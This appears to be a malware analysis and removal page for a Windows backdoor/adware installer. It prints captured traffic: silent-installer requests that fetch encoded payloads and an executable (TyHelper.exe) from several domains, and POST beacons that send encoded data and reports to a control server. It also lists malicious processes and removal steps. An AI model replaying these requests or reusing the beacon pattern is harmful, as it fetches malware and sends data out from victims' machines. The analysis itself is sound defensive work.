H.V.K.L.G.W.9.f.l.j.v.7.V.p.u.3.n.s.j.x.W.s.N.u.0.h.N.n.k.I.J.6.E./.K.
P.E.p.5.T. .E.8.S. .4.3./.6.t.u.P.v.b.C.f.J.k.7.M.j.b.B.i.N.Y.p.P.d.7.
t.h.H.M.l.T.o.P.V.o. .0.7.r.H.T.M.7. .K.Z.R.i.o.P.S.R.b.7.Z.K.I.M.X.d.
3.b.Z.U.v.V.s.e.o.o.L.5.a.M.M.v.f.5.9.R.M.B.6.H.5.p.9.G.x.B.w.b.D.y.g.
i.f.o.q./.J.h.L.z. .U.J.v.O.8.1.0.T.T.R.U.q.w.D.3.F.D.9.W.B.t.l.G.4.M.
S.e.v.W.e.a.c.q.j.1.p.H.L.m.u. .Z.9.T.E.Z.Z.2.L.N.N.m.V.j.8.a.C.O.b.q.
T.L.R. .q.J.u.e.y.a.W.R.v.t.5.S.V.5.j.j.V.i.u.x.8.A.F.z.j.L.w.o.Q.5.8.
k.H.2.P.A.v.Z.x.l.F.g.I.V.h.9.V.y.r.v.w.K.z.m.U.d.3.R.F.m.K./.L./.W.i.
m.C.G.r.3.3.b.v.e.A.3.y.t.b.M.G.Z.q.E. .e.N./. .U.K.i.D.E.i./.7.Q.m.x.
2.p.S.k.S.s.M.q.x.a.i.n.j./.J.b.E.i.4.w.g.G.M.g.u.F.h.D.z.t.L.P.c.
<<< skipped >>>


GET /?e=bsp&clsb=1&publisher=55680&country=US&dd=5&cid=767&vn=153&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: bestories.org
Cache-Control: no-cache
Cookie: __cfduid=d6208cc7f1add1143864b04d60cf818e01421556241


HTTP/1.1 200 OK
Date: Sun, 18 Jan 2015 04:44:15 GMT
Content-Type: application/octet-stream
Content-Length: 210912
Connection: keep-alive
Content-Disposition: attachment; filename="wKjUaVakO6heQO.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Server: cloudflare-nginx
CF-RAY: 1aa822e6ae3c0ed9-EWR
..z..7...U.k....).$X....D...D..........w.6......[....8@l...;9_w.....)L
....Omg`....5Tq.....0p.....(.L... *Zq.....([email protected]`....:cb......}....
.1.f...<=]b....:Oj..... Ks....7.G..../Ut.....7C.....(H1.....Jz....]
7O.....6N3....4S=.....-r.....!LA....>W*.....Ky.....$Cw....'Wh.....M
u......a3...2..N....j.\....*s.1...6al3...L!.......#......<X{....>
;.\....6.Y....5.gn....7Sf...../j.....9Mk....%Z......Ph....02gG...6.t#.
...r.,....R..,...0..N....nG;.....7V....y.xd....:Ty.....,u....SDbf....5
rr....Vq/....Wn#E....8Fh...._.]....g.Uk.....Sb.....Qv..../!Vr...82]h..
..2Ww.....$Oi....l.)....8Lu....E?`....3.i$...Jw.!....].*....5..E...JkH
0......n.....9u....;9K-......l.....&Ks....8H.....)Y9.....5Kv...U3Kh...
.}sy.....7......8H*....(Lt.....cB.....>Gm...\ Yf.....1k.....9Zr....
#Uc.....Z}.....#Do....&./.....Y.....K Jo....6.y....0Rv.....fSr....".j.
...2Jb.....*......!M}[email protected]]o...[/\~.....$=.....$F`....?
_u....AMs.....%Om...48Xm......9..... ]!....![m....3^7.....7V.....pNe..
..>J;.....(...... G*...\8T|.....$>.....8Hj....8Wt....h}u.....w.l
...Bz.h.....En..... Vm....5_"....-Oy.....{yD...".Tl...<..B....&qP..
...;hG.../.RE......x.....ypD...>.Y^.....s)......mN.....jZ.....WA...
.93S4...6.^^....,s!.... 0uT....kYk....?JO.....*[email protected]
....#.|r.....Sw....QtV......j7...?dG.....0I,...._.b`...:..=.....q.....
[z.f.....sN....&~S....&,rS....t.I...%..|....U.s....F.Of......^....W8j.
....zfa.../.Q|....."j....*?q1.....Ys....'}k....!.WT...N.a ....k.M.....
t.t...G.XN.....t_....Z.h....Vbo/....~.S......L....D.L[....-d6.....
<<< skipped >>>


GET /?step_id=1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:36 GMT
Content-Type: text/html
Content-Length: 28514
Connection: close
Content-Disposition: attachment; filename="1.txt"
..A.1.6.N.0.9./.Z.2.U.a.g.0.W.3.5.w.y.Y.V.5.o.B.2./.S.W.Z.P.s. .w.n.g.
E.9.6.a.4.a.2.Z.T.N.u.x.J.G.o.7.g.h.Q.W.O.n.y.U.E.N.g.7./.r.I.w.B.q.A.
P.E.U.k.k.N.7.d.z.f.S.2.G.0.k.N.V.3.a.u.f.X.r.a.5.w.4.X.C.q.A.o.7.o.m.
K.K.C.n.a.j.F.d.R.N.P.s.M.L.n.P.m.b.B.D.b.D.k.A.i.p.f.w.N.X.h.V.r.q.o.
S.x.U.L.S.U.U.0.n.b.8.X.C. .6.d.Q.e.9.u.r.r.i.3.s.7.h.k.x.I.2.t.o.s.0.
N.W.W.t.l.N.A.5./.K.Y.n.h.i.K.9.P.6.R.S.5.6.5.z.H.7.Z.l.j.k.v.q.m.i.k.
y.A.t.M.D.9.l.A.3.M.K.a.7.q.q././.b.I.V.m.T.C.C./.L.M.9.0.I.A.U.U.L.i.
R.9.Y.s.U.M.H.k.y.8.v.6.a.M.M.J.u.g.8.X.3.I.i.a.R.W.6.B.S.W.L. .I.E.Y.
G.u.o.T.b.4.7.G.v.B.k.e.n.g.q.p.q.i.M.I.M.F.j.L.p. .2.j.m.Q.N.o.c.o.z.
m.2.q.a.5.2.k.4.5.4.2.5.r.X.M.B.g.K.j.I.Q.s.b.O.a.Q.F.I.e.J.9.B.R.e.I.
t.U.I.7.W.4.I.5.0.j.z.M.E.F.y.W.S.H.K./.Q.h.e.h.O.m.H.h.P.b.G.P.2.O.K.
o.w.C.O.k.f.7.k.z.y.C.M.s.m.L.2.w. .x.D.P.x.W.w.q.o.q.c.k.c.X.s.d.j.C.
V.Z.u.q.j.R.S.V.D.e.s.1.l.p.E. .X.6.n.K.c.b.t.y.b.b.2.j.H.C.A.y./.K.R.
B.v.4.4.0.Y.m.g.g.M.t.A.Y.8.r.V.D.M.E.w.e.h.E.c.Z. .Z.0.7.o.g.7.L.x.S.
4.4.A./.N.f.C.e.T.L.k.d.X.9.R.r.E.S.r.0.x.2.f.E.m.3.U.A.Q.v.Q.a.W.A.9.
N. .T.O.0.8.S.y.8.w.7.G.a.R.p.V.O.X.z.O.p.R.x.o.C.Y.L.z.X.U.t.D.k.f.x.
1.4.r.S.y.3.F.4.U.7.N.T.j.L.P.Y.o.J.a.l.0.w.l././.D.A.3.d.z.p.f.m.p.J.
L.k.t.3.B.Q.F.I.r.5.L.O./.v.v.e.a./.y.i.4.S.0.i.8./.1.W.R.K.c. .2.5.B.
q.V.s.Y.6.9.B.h.U.d.d.v.8.3.m.Z.P.6.S.G.9.K.F.q. .B.I.x.Z.U.V.6.A.8.v.
x.Q.p.y.g.2. .O.v.p.r.V.9.R.R.W.6.M.n.H.a.y.H.4.g.a.X.N.w.T.U.B.a.c.b.
k.W.x.u. .5.j.l.I.4.w.v.p.n.U.D.E.X.9.1.Z.k.L.U.I.j.j.1.A.1.I.8.8.p.Z.
b.2.u.3.e.5.3.P.s.H.R.t.k.e.4.U.3.K.W.A.C.n.u.9.6.r.o.H.B.X.A.6.f.
<<< skipped >>>


GET /?e=ytr&cht=2&dd=19&clsb=1&publisher=55680&country=US&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: bestories.org
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sun, 18 Jan 2015 04:44:02 GMT
Content-Type: application/octet-stream
Content-Length: 1480430
Connection: keep-alive
Set-Cookie: __cfduid=d6208cc7f1add1143864b04d60cf818e01421556241; expires=Mon, 18-Jan-16 04:44:01 GMT; path=/; domain=.bestories.org; HttpOnly
Content-Disposition: attachment; filename="yNMtlpV56NSC6w.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Server: cloudflare-nginx
CF-RAY: 1aa822905ef50ed9-EWR
..z......4.k....|.l2....=...=.......zq>$........[XsUX^,* >d=....
........l`#..V&90..............`h~.zU >...............,h`F.r-#65...
...........$pXN..%;.=.............uw3MK[r.6..............ka4@H^}.5..-.
..........i"rZH..' .).............lwj^P.$;...............cv'nw..=-....
..........f|7mAI117.J^...........89&....`.!^=............:R(h.z{.U[A..
..........`w&.cY ;...............mklTOK!.................kaIDX2./NH1..
.......... #?"FP :,..............w{h\..#=9..F...........siKpH_*=-.....
..........zQg....................e}oNVb..kTVN...........1ox..^&`lWEO..
.........nbxRXV.!................gp{ZG.#0...............kyuUE] >f-.
............q6mMGW7;;..$............fpR.c/%9...............f~qu9w'20?'
............@[email protected].)..X............46FE`4>.
..6............uapFKs)>;TV&...........lmrOJ.O................d~uUes
.o#WVK............L"&.w.{cM^D.............KNHXR4&<..............Veq
P.N-#6E..............ecE.B))w...............'[s.\L-1-J.............pnv
I.O)q>.R............t~7ABU3;-..Z............%4oFP!83A..............
&~nCWOh'1I.............v`pJ\N$<7F.............nxb@@[b,6C...........
...{vl.QG>0...............i0hGGYg 2.S............{bm.]Q ?z.........
......DZ..B.l8...............iv=ZVM=5-.U............v!:f\R%:|E1.......
.....n~c.YP&n,...............z:= w)?%4..............d~sL[S;'?..Q......
.....bbu..Kx..(.............PYgUHG..7..!.............GmY.r}#..........
.....]`HU....n%.............o9_L...} PUI............]0.ib..%..).......
.....pDk\..{.;..............B}`Hw.t..2.:...........ig/...f|.1.....
<<< skipped >>>


POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.flagmisterlibcontent.net
Content-Length: 3599
Cache-Control: no-cache

data=DUIqmSWMEahsc1d89/0mxMGHyAk6jiRdiFXkLYwLp3r6FfGQoSFPra4Y64x4m6dFoiGDd73Q/M48MO9qpRi7WDD4Icr49mhmgp3UCp0ULD68k6PM71BTSgKyp4UtCzb/I7calIV28Fp9Fk6O7X1s4n xRXGLFXouCz131OhJLRgVhRUQmpG2uyHi/oeDu/YC cTxe5/CLhyLs8yKV6u OXfbhQK7k8u kA3TQPh3S1fFSE1YW7TcMuUOQaTRNb71 s12By8y6i/3N0XliF9daJnSnMpVxN7/toFON6SiBSLsfNNs2J6XAe8dULxokbS0mDJx0fhDDRAX8eD53l2aeiPPaUaNR/RHubtny/a5HR sKdXAPmbt/r7Ii7ftU2sqJFhjXo 4GEN/skO99B3CXXmIyaqNUfAAn9R7hfCF8zk42 Z4KrRuBaye59jb01tcSmugD0oajvw23T8smpCSXJzz5r6N8 dL1JcTPhJ9rik6/33FVAPVqA0q3YpHJhtdj6Ms6liYkLoYeO g9DsdM9clCl3ejCKEy00F9sSSqae62j8Di71wcHvhVivbJJq/TMmaPw/gKLdV7oN0MU3vX1hqdDZTTo6Io8PlAnKaELUzGkc/cqrgaYEgaACfigswicQfTYRWGjZbqSKAF02NadRy8brs/yGB1ALEH17C5iCByNzmRc DMNmRlWkvC3WK0gkGYDEg6VE90ketiqkflH9dmtN70IrpoFHaYj ZxlTOltpHSF5eEVnlk3 xiDOItMVrMC7c0pYZzgxf09EQSrHsvfZzLjY6uTcpFx82vrgbpFSf1A1mzyhwQ6Fb3oX3mcl fOmqw6cdstbye7c9kAcQxHlFEhwhC9CGic8S4ji0rAjuGT 2vp1JOmh RzPNQduFzc2KdZH8w 4U/GcVR3wy&report=MSy0J2RF0OYs70YUMOfDCgz2TvPcHTaFwwqNaG0k0EwI uA8JCQ7aidKCuHS/N5k3nBmO/68oWnIKEiNXsEhO4A/kKp7x1hnwysXNqUyDhPZFQeYKKJyspw/3vabcB8vJE67aG5Tcg0Qz10WxmpkgM/Dn0i Gei8ma2yMtpOAVHDB6RkwoIDtgYoOU9QTd/MKHa0g B3tL vupMPKeg1DAcueD9/7iz3xZz2hQFGp7Rr/sk67Vr2oj2tDd jo5h5nmIdBsveJCyUuhRPfDcit6rHewVKG2c5LAigwwy8BW609WdkQG3ObpGRktM/cIl9EzyMImu9IN48DHzIbTq74/38vH6Hlgrn0HlvxlwbXz20k yhQKpmJUkKdVn0N5v
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:36 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..



GET /?e=dfd73&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=55680&&&country=US&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: masterial.net
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sun, 18 Jan 2015 04:43:45 GMT
Content-Type: application/octet-stream
Content-Length: 1523454
Connection: keep-alive
Set-Cookie: __cfduid=df7bd18451bc1541b0698dd4c8d03ba811421556225; expires=Mon, 18-Jan-16 04:43:45 GMT; path=/; domain=.masterial.net; HttpOnly
Content-Disposition: attachment; filename="CmPMt7BDxLvtoE.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Server: cloudflare-nginx
CF-RAY: 1aa8222b16e90ed3-EWR
..z..>..Ij`k.....D"......x...x.........sG=......v(..A[.....J...0..M
...'..qS..,..E_.....v...z..r...6.. [..q..]I..i..*J...../U.....5T.....$
I.....'......8i.....$n.....%q.....:z.....q3..u..t....O.)e...Q.:v...0.4
n...C.4x..tH.3}...M.'g...H.8b...D.'{...K. [email protected].*}...C.4....B.-
[email protected]~.._D. b..vV./)..W-.d,...E..0...B......Y..n...F......G..s..ZY..
j..#O..l..$#..r..5[..l..5M.....(Z.....#J.....4S.....>^.....Sn..o..=
k.....&q.....5......s)..R..er...M.-q...Q.<a...D."u...A.=...tV.tf...
@.4|...I.&b...A.'d...Z.p`...\.:m...@.(c...O.5`..l@.,}...I.2|...X.zy...
X./c...Y.,x...[..y......e...X..v...C..c..mG..%..p...7..6S..q..1W..o..Y
T..}.. J.....3Y..F..5R.....1H.....&P.....:i.....<`.....8m.....;m...
.. r...L.'t..pL.9p..Q..rc..A\.8=....._o...X..y.....12..L..e=.....r ..X
..(...... ....N.s!..C..-......a9..FQ.?q..Z\.J......o)..J..Re.._...=...
>..7...L..7..G...1..NA..4..m...1..L[..?..XT..{..r.../..IH..D..n....
..iY....._F.....%...]..u ..T..9...K..a/..j..(!..G..5a..R].6"...D.<~
..EZ.i-..G..`...BR..3..C..^t.....,#...B..=..G..!......m%..BU.&m..VX.U}
.....k-..F..Va..S..w9...".?;...H.3;..C..c=..JE..8..Q...5..pW..;..o^...
..N... ..MD..8..j...b..m]..f..[B../..<*.....o...W..10.....}...R..k.
.....$......7r............Bn.....|8..Y..Cv..N..d,.../..c...4.;p..sY.*.
[email protected]:...<.zs..I..i'..@_.r$.....n$..X..ix..[].p...zN.#f...C.8e...C
./{...5. t..^^.-z..C..)s...Q..y...)..p...T..d...X......Z..v..6A..~..N\
..6..sF..%..`M..u../J......M.....*L.....,O..y..&P.....>...F..-h..A.
.=a.....%r..r..-s...O. r...G.<i...M.&q...M.=y.....:z..pL.3}...M
<<< skipped >>>


POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.flagmisterlibcontent.net
Content-Length: 2460
Cache-Control: no-cache

data=HxWEfBVRV5BID9/XZTi11&report=EyUxCmWQR1aZCmbF56nS9u0gwVJJL5hwj16T3A9tYaeKXCXnDrk6VW1wwH9LJw0Q y4TfQtGdHer1Z/DPQKADo35pVNToOc7Vin8uYrzr7VPdsdmxXvQlU7Mqc6X6mzhmlSOvz0lew19t An6GorSJ4I2Xme9ioexNDctguWzIa2khbxFQRKfpgaj9zW10aabacFBQhLwGVYL2KogMzQjn31Xi8Pr3qeEkgtFc6//dX86hWywQInk9oodBAf6Bl9GKEWRdTbdaTmcM9LUXjKKMlhDwWzpKOjeKyCtEWWq48VvqlO/mz4OqMHg6bCuaXC/k9y3Yn94PghMEQcQDxHQZQsYxihRqGgXtE7yXhERwI/lIkVwLYxrfJVGKtln35OVLqntxia EVlwwkhV0hAAImUI nqWdWJC5QRWHZxzTUcxEH gtKI/HUd8S0hfdJn WZq9htzmWDZFL6vBJjWK0LZAJI7SMR825SG010hH/czZClCh2w1Lj7tTF2LWke90AHOjOrv1qBnXzKZp KLbWXsmPAyNnFbKdqVlsIv8p DtGtoMB9RQhdhicQzLHBOuR5FgGF1Hyv2TeDzAGZkddYMNdw9gumzxofpb iEQCp5iKHhbgxIppqbIe3RdQhTtzhezDjVw7Pksdr4eBNzBdlxJ2baiEDnzrfuznN4CTciRrVdMu42/epLpwtcijhRh9lPUiD0SOQXkuQx3mLXDITmXZ2voqF8LOxrPcmakrW9 UQNLEiozo1byNF5g0SymviApPABHLGBoYXk1Ye23mRt8WUGOUxCKdWWC8FY3eJNAV0LauEfUlf9RifZ mGfKT8U36CDfcUbmYY6o8rATYRRADXNugffQNn7dAbKjX8d7oeGDXVkvpN8DoQhWs035qd6oXD6sWR4wlKr7PIMWvOfCpyVspUhD1oqxEBe0P/ qG/w8 ShZcM58jZwsfthH0arIDGLlNaMviPQ31234xZV4Az3E6/uAc7fdX9vLh7NOGOsjF36d0le0VD4FLVbvO4RyYiSnkV15dtd2jZsA8iju0 UtEA7xbx Wv7RHzSseMzYAFtwRuSVuwDAY7tPURpgAs42zd8Z4 2zh TYu2k0oipSSpXqtPSXkiNwoxs/szpeSiLXErE/pBLjdBErqkze0t2IWKffFnLvwReo/q9lN STdtbCqAH/ritpKrNPVUCtYXPowcr/trLDD1ffCbf932V9K0mkelZaTxQC1T7PhsTl7ZpOnI1s41IYUL8Y3PbL/QJ5lv5OFRIy7ZnmYz
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:44:20 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..



GET /?step_id=1_1_4&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:44:10 GMT
Content-Type: text/html
Content-Length: 10646
Connection: close
Content-Disposition: attachment; filename="1_1_4.txt"
..L.N.8.R.2.X.Z.R.P.b.R.m.B.K.Y.7.8.9.e.C.1.Y.D.d.K.g.o.8.i.s.2.V.L.S.
F.e.R.G.t.n.E.k.u.K.e.t.V.X.c.m.a.L.X.8.u.B.T.m.o.c.a.F.l.X.i.s.N.r.4.
I.B.0.B. .5.k.R.n.Y.b.E.n.Y.w.D.4.9.K.H.l.R.z./.p.Y.c.l.E.4.f.6.S.J.J.
J.6.H.s.W.W.4.k.o.g.s.I.t.x.I.x.s.k.t.h.L.x.k.U.v.U.U.E.S.J.k.7.L.d.m.
Z.e.p.H.R.v.d.u. .t.N.S.1.n.O.w. .T.X.p.h.s.J.w.E.4.C.M.p.c.R.7.v.s.7.
K.J.4.e.I.b.d. .O.4.T.Z.C.2.l.D.8.V.n.k.P.N.L.4.P.R.D.i.Y.6.K.b.l.q.c.
a. .S.O.1.p.j.6.Q.k.Q.p.r. .y.y.X.Z.I.X.T.t.O.M.j.G.w.x.K.m.C.Y.d.Z.V.
X.N.H.z.j.O.2.T.H.B.K.3.0./.7.T.a.i.n.I.4.D.V.i.Q.k.M.U.d.I.J.3.z.Z.b.
e.W.R.1.1.E.x.k.R.C.Q.J.w.C.t.g.F.g.3.a.8.1.0.y.h.t.V.G.1.v.S.u.e.e.m.
M.b.j.d.9.I.7.G.H.2.6.D.j.r.D.p.T.F.9.a.g.V. .Q.D.a.j./.a.o.T.K.W.k.Q.
M.r.Y.n.g.w.5.K.l.6.b.J.0.V.w.A.4.H.1.t.v.0.P.m.R.K.z.A.D.2.J.4.z.J.b.
U.W.k.9.X.J.d.w.5.J.q.l.V.I.A.P.n.D.I.X.M.T.9.E.Q.n.D.U.v.a.W.R.s.F.D.
H.i.t.s.M.s.f.K.u.l.Y.A.J.8.c.9.M.N.A.Z.n.h.q.L.g.1.n.I.5.y.N.o.L.q.i.
R.x.B.Z.g.U.6.x.v.5.P.p.J.A.g.z.5.P.0.f.Y./.8.4.a.t.Y.I.k.i.g.T.B.p.e.
L.w.A.7.t.E.x.v.d.w.4.q.8.w.s.4.Z.k.P.u.U.M.f.3.k.b.u.T.0.I.o.g.O.F.q.
/.h.7.A.3.b.9.s. ./.I.E.c.t.u.p.C.p.D.L.b.C.o.M.P.m.S.D.5.U.Y.S.W.I.Z.
E.N.O.5.K.T.N.Y.p.z.R.f.g.A.S.m.M.g.s.i.x.I.x.u.g.X.Q.2.N.j.g.r.j.W.U.
X.S.m.s.x.r.G.b.8.q.C.e.w.Y.s.u.h.1.8.4.w.y.C.k.P.V.m.O.e.5.b. .d.Q.Z.
y.x.4.M.G.5.b.a.3.w./.R.s.W.R.G.k.y.E.Q.K.L.9.w.K.o.E.2.p.F.6.T.y.n.I.
M.C.B.M.K. .H.t.C.b.e.g.N.s.J.a.N.C.p.1.C.G.A.U.a.i.2. .2.g.y.S.O.F.u.
4.6.5.U.R.n.g.X.u.O.g.1./.p.y.r.i.L.U.c.s.n.I. .p.4.l.c.Z.X.v.2.u.a.p.
K.Y.o.A.4.f.m.o.n.o.x.e.P.D.f.z.L.t.0.N.f.b.c.A.M.B.z.h.P.d.r.x.C.
<<< skipped >>>


GET /?step_id=1_1_3&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:56 GMT
Content-Type: text/html
Content-Length: 10474
Connection: close
Content-Disposition: attachment; filename="1_1_3.txt"
..c.C.N.s.u.2.L. .n. .f.F.c.U./.V.N.P.M.u.6.x.W.F.j.w.7.d.M.9.5.K.H.Q.
w.X.X.L.c.t.n.V.Q.5.b.e.k.z.Q.1.1.a.s.8.2.7.L.T.w.b.g.l.t.Z.1.n.h.6.2.
W.G.Y.2.5.u.y.R.t.G.X.L.3.X.K.f.b.W.F.q.6.Z.Q.P. .J.S.F.N.l.Z.4.z.4.J.
4.V.1.g.R.5.w.t.0.Z.j.w.y.N.f.q.E.c.q./.N.1./.m.v.o.j.G.T.F.Y./.k.t.A.
C.C.a.i.7.O.I.c.2.N.a.X.x.7.T.l.N.o.V.i.X.Y.j.8.U.l.m.P.J.v.E.j.p.p.k.
E.i.O.S.H.4.s.n.G.q.R.k.S.M. .n.A.A.m.1.8.O.P. .c.H.F.P.K.7.C.R.f.Y.Z.
O.W.i.E.9.7.H.V.v.L.q.M.X.I.A.2.X.x.q.g.J.c.r.s.Y.U.7.Z.z.V.2.t.Q. .9.
E.r.i.l.A.W.t.5.N.O.j.N.s.B.W.W.B.p.g.e.2.M.O.J.6.t.k.F. .A.x.R.A.t.D.
T.T.S.6. .X.Q.k.0.2.Z.0.0.J.B.E.l.Z.b.7.x.z.G.l.k.I.g.Y.N.O.F.r.Z.V.D.
5.F.v.c.h./.z.x.z.d.p.U.g.V.k.9.h.d.N.d.6.W.K.e.N.p.G.B.3. .K.a.k.K.H.
y.m.3.X.Y.L.j.s.Y.P.w.4.Q. .H.Q.I.c.Q.6.S.t.i.J.4.s.2.q.b.g.p.c.e.1.k.
i.u.8.t.v.d.p.w.w.C.J.m.j.G.C.X.N.Z.r.i.U.A.7.Y.P.t.D.v.p.P.W.y.i.0.m.
X.M.7.G.o.X.a.l. .c.l.m.4.z.f.Q.U.q.A.A.w.O.b.7.Y.s.f.T.9.S.I.3.C.M.J.
S.W.D.I.b.4.N.2.W.v.p.4.W.k.k.3.i.h.K.A.v.W.i.u.Y.U./.L.E.V.T.W.T.X.g.
 .A.j.5.0.3.N.9.o.0.k.C.N.W.7.Q.a.s.0.x.0.i.I.T.r.9.H.h.Y.Z./.M.D.N.W.
7.U.6.8.H.8.Y.o.B.o.0.a.Y.5.x.8.v.u.r.Q.B.c.u.g.G.I.j.p.4.H.V.A.I.5.d.
T.O.8.6.D.H.Z.A.O.H.K.k.V.Q.E.r.4.Q.t.h.M.q.w.g.F.T.z.3.J.u.D.z.E.b.t.
A.e.q.K.p.4.1.5.b.G.6.M.6.2.H.N.a.S.x.k.J.N.N.A.F.K.q.L.X.q.s.Q.d.o.K.
4.u.4.b.P.C.w.E.B.d.y.C.c. .V.F.t.q.S.H.1.U.V.1.t./.K.Z.i.2.w.b.8.K.3.
W.h.M.s.u.U.6.J.b.F.N.7.8.3.F.A.E.x.8.H.t.K.J.m.R.V.N.T.o.y.o.v.P.2.H.
H.l.w.8.E.4.g.j.m.0.q.g.f.f.R.3.o.f.a.b.M.u./.W.Y.G.c.h.D.S.A.o.i.x.I.
W.p.P.L.j.f.7.d.T.5.b.B.w.V.Q.Z.m.R.B.Y.e.a.6.H.B.R.1.b.I.o.H.Q.X.
<<< skipped >>>


GET /TyHelper.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: settlemental.net
Connection: Keep-Alive


HTTP/1.1 100 Continue
HTTP/1.1 200 OK..Server: openresty..Date: Sun, 18 Jan 2015 04:44:26 GM
T..Content-Type: application/octet-stream..Content-Length: 6475776..La
st-Modified: Fri, 09 Jan 2015 04:20:07 GMT..Connection: close..ETag: "
54af56f7-62d000"..Accept-Ranges: bytes..MZ......................@.....
..........................................!..L.!This program cannot be
 run in DOS mode....$...........I.m.I.m.I.m.....d.m.....X.m.....,.m.@.
..N.m.I.l...m./&..H.m.I.m.B.m..$..H.m..$..H.m.RichI.m.................
PE..L....V.T.................(....Z..*...........@....@...............
[email protected][email protected].
......................b..2......................................@.....
[email protected]....&.......(..............
.... ..`.rdata..."...@...$...,..............@[email protected]
[email protected].............@[email protected]..:w..
..b..x...Xb.............@..@..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............D$.....D$......@[email protected].... f.
[email protected]..=..9...Z.9t.
.0=.Z.9t =}4.9t.=.2m.u....9..}..t..}4.9..f.............^].........U..W
V..........=....H....S....D$..t$..4$.R.....<$...H..........e.^_
<<< skipped >>>

The Backdoor connects to the servers at the folowing location(s):

rundll32.exe_1324:

.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    mscorsvw.exe:172
    regsvr32.exe:388
    regsvr32.exe:1776
    rundll32.exe:1848
    rundll32.exe:1324
    %original file name%.exe:2008
    %original file name%.exe:1664
    %original file name%.exe:1252
